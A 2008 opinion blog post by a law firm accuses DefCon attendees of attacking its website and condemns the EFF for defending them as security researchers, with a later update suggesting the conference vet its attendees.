August 19, 2008

Dozier Internet Law: Hackers Hack Away at DefCon Annual Convention

Defcon, the annual convention in Las Vegas, began August 8 and it looks like the hackers sitting in the audience and participating in the hacking competitions spent two days trying to hack into the Dozier Internet Law website using SQL Injection Attacks, Mambo Exploits, encoded cross site scripting attempts, shared ciphers overflow attempts, and the like. The frustrated perpetrators (they never got access) were sitting in the Riviera Hotel ballrooms, I suspect, listening to the presentations, and participating in the now infamous "free for all" where the attendees hack into systems in an "Olympian-like" competition to gain bragging rights. The attempts likely came through "backdoor" exploits of webservers around the globe. The favorite and most common ISP access was from Vietnam and China, with Beijing the host and doorway of the Olympic Games as well as many, many hackers.

The Electronic Frontier Foundation staffed a booth full of lawyers to help hackers deal with "bogus legal threats" (the EFF's own words). While attending to their session presentations, offering advice, and driving the underworld of the web to the annual EFF fundraiser, they were losing big time in Court. Then the EFF filed legal documents, released press releases, and held news conferences in which they claimed DefCon attendees are akin to "security researchers" that are gathered in Vegas to listen to presentations involving security.

That's absurd. The graph above shows what these hackers do. They come to Vegas to learn how to hack into systems and create havoc. Going after law firm websites and administration areas that contain attorney/client protected communications and documentation, and even court ordered "sealed" files, is a direct attack on the integrity of the judicial process and the judiciary. And our experience at Dozier Internet Law is just the tip of the iceberg.

This convention wouldn't even exist if the FBI, CIA, Department of Justice, and the National Security Agency and others weren't so anxious to infiltrate it every year for intelligence. Think about it. Hackers from around the world come together once a year and learn how to hack better. Those that support and encourage and facilitate these hackers cannot hide behind the "I didn't know they were hacking while I spoke" defense. Yes, there are researchers and intellectuals and law students and college professors in attendance. But, for the most part, there are hackers learning and improving their trade. And despite EFF's absurd contentions otherwise, the Computer Fraud and Abuse Act, as well as many state computer crime statutes, can and should be used to prevent the aiding and abetting that is the core benefit seen by most attendees.

"SECURITY RESEARCHERS"? Give me a break, Electronic Frontier Foundation. While your lawyers call the hacking laws "bogus", and tell hackers how they can ignore the "bogus" laws, all of the scofflaws are being emboldened by your advice and guidance. The only reason there isn't a round up and indictments for hacking, conspiracy and aiding and abetting is because your annual conference is infiltrated so extensively by the government that it provides a honeypot of intelligence. And adding some professors and other intellectuals to the mixing pot won't clean things up.

Notice to EFF: DefCon is for hackers. Many attendees commit criminal acts while in attendance in organized war games. Others commit criminal acts as they learn the tools of the trade in the very ballroom during speaker presentations. They hack into banks, into personal computers, into businesses, into government agencies, and steal private information, cost businesses billions of dollars annually, and ruin the financial well-being and impair the emotional stability of individuals all across our country. This is the mob of the 21st century; this is the mobosphere. They are hoodlums, thieves, scoundrels, and all too often already convicted felons after the next easy mark.

The only "security researchers" in attendance, I suspect, are the good guys. But then again, they don't need legal advice from EFF, do they?

8/26/08 Update: There have been some of the 9,000 attendees who have blogged this and defended DefCom by pointing out that there are bad eggs everywhere, and most of the attendees are "good guys".

Anyone can attend, unless, as real life experience tells us, you are a SPEAKER arrested by the Feds, a REPORTER "outed" by the Conference management and pursued by a mob of attendees, or a registrant intercepted at our border before getting into the US. Couple that with the session this year on how to hack a Boston public transit system and get "free fares for life" (interrupted appropriately by a Federal Court lawsuit and injunction), and the MSBlast Worm and Virus fiasco of several years ago where the Department of Homeland Security had to issue a global alert the day before the conference, and the many, many other incidents that are recorded for posterity online. And then lay on top of that the Electronic Frontier Foundation's prominent and high profile attendance and involvement at the conference attacking our computer crime laws as "absurd"...laws passed and strengthened post 9/11 by the US Congress.

Are the "good guy" attendees naive? Are they in a state of denial? Are they willing to overlook the "open access" problem in order to keep their employer picking up the tab for three days of partying, fun, gambling etc. in Vegas? Or are they enjoying the short time they have each year being exposed to the "dark side"?

So, here I am, getting feedback from those in the know that I "got it right on". And yes, I agree with some of the feedback I have received...the irony is not lost on me...supposed security professionals operating in an insecure and uncontrollable environment and unable, or unwilling, to recognize a huge and pervasive security risk.

Here are some suggestions: Establish some meaningful vetting of attendees, require full disclosure and contractual commitments, screen out the presentations that rely upon illegal hacking for the subject matter, get rid of the "aliases" used by attendees to hide identities, and act responsibly.